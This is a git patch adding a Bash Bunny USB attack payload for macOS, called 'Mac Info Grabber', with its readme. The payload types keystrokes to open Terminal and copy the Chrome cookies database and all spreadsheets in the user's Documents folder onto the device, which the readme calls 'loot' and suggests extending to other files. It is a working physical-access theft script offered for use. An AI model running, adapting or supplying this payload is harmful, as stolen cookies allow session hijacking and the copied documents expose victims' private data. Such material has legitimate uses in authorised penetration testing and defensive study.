From adb87d9919daad551ebaac5ca90389708e238f9d Mon Sep 17 00:00:00 2001
From: bobmcdouble3 <bobmcdouble3@gmail.com>
Date: Wed, 8 Mar 2017 18:27:47 -0500
Subject: [PATCH] Add files via upload

---
 payloads/library/macinfograbber/payload.txt | 33 +++++++++++++++++++++
 payloads/library/macinfograbber/readme.md   | 20 +++++++++++++
 2 files changed, 53 insertions(+)
 create mode 100644 payloads/library/macinfograbber/payload.txt
 create mode 100644 payloads/library/macinfograbber/readme.md

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
new file mode 100644
index 0000000..e63b44f
--- /dev/null
+++ b/payloads/library/macinfograbber/payload.txt
@@ -0,0 +1,33 @@
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 8000
+QUACK STRING mkdir -p /Volumes/BashBunny/MacLoot/xlsx
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/MacLoot/chromecookies.db
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/MacLoot/xlsx/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK GUI q
+QUACK DELAY 500
+QUACK ENTER
+
+# Green LED for finished
+LED G
+
+files=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+if [ "$files" != "0" -o "$files2" != "0"]
+then
+# Got spreadsheet files
+LED R B
+else
+LED R
+# No spread sheets
+fi
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
new file mode 100644
index 0000000..2222832
--- /dev/null
+++ b/payloads/library/macinfograbber/readme.md
@@ -0,0 +1,20 @@
+# Mac Info Grabber for the BashBunny
+
+* Author: kmakblob
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
+the Documents folder and places them inside a folder on the BashBunny called MacLoot.
+
+This payload can be easily modified to grab other files like word docs or csv files.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Green              | Attack Finished                              |
+| Purple             | Successfully grabbed xls or xlsx files       |
+| RED                | Did not get any xls or xlsx files            |